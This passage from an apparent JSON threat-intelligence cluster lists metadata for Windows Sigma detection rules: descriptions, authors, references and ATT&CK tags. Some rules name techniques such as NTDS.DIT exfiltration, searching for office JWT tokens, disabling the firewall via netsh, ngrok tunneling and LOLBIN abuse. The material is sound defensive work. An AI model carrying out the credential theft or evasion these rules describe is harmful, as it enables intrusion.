"frack113", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_machineguid.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", - "value": "Suspicious Query of MachineGUID" - }, - { - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/21", - "falsepositive": [ - "File located in the AppData folder with trusted signature" - ], - "filename": "proc_creation_win_susp_microsoft_onenote_child_process.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_microsoft_onenote_child_process.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" - ] - }, - "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", - "value": "Suspicious Microsoft OneNote Child Process" - }, - { - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_missing_spaces.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cyb3rops/status/1562072617552678912", - "https://ss64.com/nt/cmd.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", - "value": "Missing Space Characters in Command Lines" - }, - { - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_mofcomp_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", - "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", - "value": "Suspicious Mofcomp Execution" - }, - { - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "meta": { - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "creation_date": "2020/10/08", - "falsepositive": [ - "Administrators or Power users may remove their shares via cmd line" - ], - "filename": "proc_creation_win_susp_mounted_share_deletion.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ] - }, - "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", - "value": "Mounted Share Deleted" - }, - { - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_mpiexec_lolbin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1465058133303246867", - "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", - "value": "MpiExec Lolbin" - }, - { - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "meta": { - "author": "frack113", - "creation_date": "2022/11/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_msbuild.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", - "https://www.echotrail.io/insights/search/msbuild.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", - "value": "Suspicious Msbuild Execution By Uncommon Parent Process" - }, - { - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "meta": { - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", - "creation_date": "2019/02/22", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_mshta_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://blog.sevagas.com/?Hacking-around-HTA-files", - "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", - "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", - "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", - "https://twitter.com/mattifestation/status/1326228491302563846", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" - ] - }, - "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "value": "MSHTA Suspicious Execution 01" - }, - { - "description": "Detects suspicious mshta process patterns", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_mshta_pattern.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://en.wikipedia.org/wiki/HTML_Application", - "https://www.echotrail.io/insights/search/mshta.exe", - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ] - }, - "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "value": "Suspicious MSHTA Process Patterns" - }, - { - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_mshtml_runhtmlapplication.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/n1nj4sec/status/1421190238081277959", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "value": "Mshtml DLL RunHTMLApplication Abuse" - }, - { - "description": "Detects execution of msiexec from an uncommon directory", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/11/14", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_msiexec_cwd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/200_okay_/status/1194765831911215104", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ] - }, - "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "value": "Suspicious MsiExec Directory" - }, - { - "description": "Detects suspicious msiexec process starts with web addresses as parameter", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/02/09", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_msiexec_web_install.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", - "value": "MsiExec Web Install" - }, - { - "description": "Downloads payload from remote server", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2019/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_msoffice.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", - "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", - "Reegun J (OCBC Bank)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", - "value": "Malicious Payload Download via Office Binaries" - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "meta": { - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "creation_date": "2021/12/07", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_netsh_discovery_command.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_discovery_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ] - }, - "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", - "value": "Suspicious Netsh Discovery Command" - }, - { - "description": "Detects persitence via netsh helper", - "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_netsh_dll_persistence.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", - "https://attack.mitre.org/software/S0108/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.007", - "attack.s0108" - ] - }, - "uuid": "56321594-9087-49d9-bf10-524fe8479452", - "value": "Suspicious Netsh DLL Persistence" - }, - { - "description": "Detects netsh commands that turns off the Windows firewall", - "meta": { - "author": "Fatih Sirin", - "creation_date": "2019/11/01", - "falsepositive": [ - "Legitimate administration" - ], - "filename": "proc_creation_win_susp_netsh_firewall_disable.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", - "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" - ] - }, - "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "value": "Firewall Disabled via Netsh" - }, - { - "description": "Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\\Program Files')", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_netsupport_rat_exec_location.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "37e8d358-6408-4853-82f4-98333fca7014", - "value": "Execution of NetSupport RAT From Unusual Location" - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "meta": { - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "creation_date": "2021/12/07", - "falsepositive": [ - "Administrator, hotline ask to user" - ], - "filename": "proc_creation_win_susp_network_command.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ] - }, - "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", - "value": "Suspicious Network Command" - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_network_listing_connections.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ] - }, - "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", - "value": "Suspicious Listing of Network Connections" - }, - { - "description": "Detects execution of Net.exe, whether suspicious or benign.", - "meta": { - "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", - "creation_date": "2019/01/16", - "falsepositive": [ - "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." - ], - "filename": "proc_creation_win_susp_net_execution.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", - "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", - "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", - "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1007", - "attack.t1049", - "attack.t1018", - "attack.t1135", - "attack.t1201", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1087.001", - "attack.t1087.002", - "attack.lateral_movement", - "attack.t1021.002", - "attack.s0039" - ] - }, - "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", - "value": "Net.exe Execution" - }, - { - "description": "Detects net use command combo which executes files from WebDAV server; seen in malicious LNK files", - "meta": { - "author": "pH-T", - "creation_date": "2022/09/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_net_use.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/ShadowChasing1/status/1552595370961944576", - "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "value": "Suspicious Net Use Command Combo" - }, - { - "description": "Detects a when net.exe is called with a password in the command line", - "meta": { - "author": "Tim Shelton (HAWK.IO)", - "creation_date": "2021/12/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_net_use_password_plaintext.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml" - ], - "tags": "No established tags" - }, - "uuid": "d4498716-1d52-438f-8084-4a603157d131", - "value": "Password Provided In Command Line Of Net.exe" - }, - { - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/14", - "falsepositive": [ - "Rare legitimate installation of kernel drivers via sc.exe" - ], - "filename": "proc_creation_win_susp_new_kernel_driver_via_sc.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", - "value": "New Kernel Driver Via SC.EXE" - }, - { - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_new_service_creation.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", - "value": "Suspicious New Service Creation" - }, - { - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/14", - "falsepositive": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" - ], - "filename": "proc_creation_win_susp_ngrok_pua.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://ngrok.com/docs", - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", - "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", - "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", - "https://twitter.com/xorJosh/status/1598646907802451969", - "https://www.softwaretestinghelp.com/how-to-use-ngrok/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ] - }, - "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "value": "Ngrok Usage" - }, - { - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Network administrator computer" - ], - "filename": "proc_creation_win_susp_nmap.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://nmap.org/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nmap.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ] - }, - "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", - "value": "Suspicious Nmap Execution" - }, - { - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "meta": { - "author": "Max Altgelt", - "creation_date": "2021/12/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_non_exe_image.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentestlaboratories.com/2021/12/08/process-ghosting/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "value": "Execution of Suspicious File Type Extension" - }, - { - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_ntdll_type_redirect.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.x86matthew.com/view_post?id=ntdll_pipe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "value": "Suspicious Ntdll Pipe Redirection" - }, - { - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_ntds.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://pentestlab.blog/tag/ntds-dit/", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", - "https://github.com/zcgonvh/NTDSDumpEx", - "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", - "value": "Suspicious Process Patterns NTDS.DIT Exfil" - }, - { - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/14", - "falsepositive": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" - ], - "filename": "proc_creation_win_susp_ntdsutil_usage.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", - "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)" - }, - { - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "meta": { - "author": "Elastic (idea), Tobias Michalski", - "creation_date": "2022/05/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_ntlmrelay.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/med0x2e/status/1520402518685200384", - "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" - ] - }, - "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", - "value": "Suspicious NTLM Authentication on the Printer Spooler Service" - }, - { - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "meta": { - "author": "Nasreddine Bencherchali @nas_bench", - "creation_date": "2021/12/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "value": "Suspicious NT Resource Kit Auditpol Usage" - }, - { - "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", - "meta": { - "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate use of odbcconf.exe by legitimate user" - ], - "filename": "proc_creation_win_susp_odbcconf.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", - "https://twitter.com/Hexacorn/status/1187143326673330176", - "https://redcanary.com/blog/raspberry-robin/", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.008" - ] - }, - "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", - "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe" - }, - { - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/25", - "falsepositive": [ - "Legitimate command-lines containing the string mentioned in the command-line" - ], - "filename": "proc_creation_win_susp_office_token_search.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": 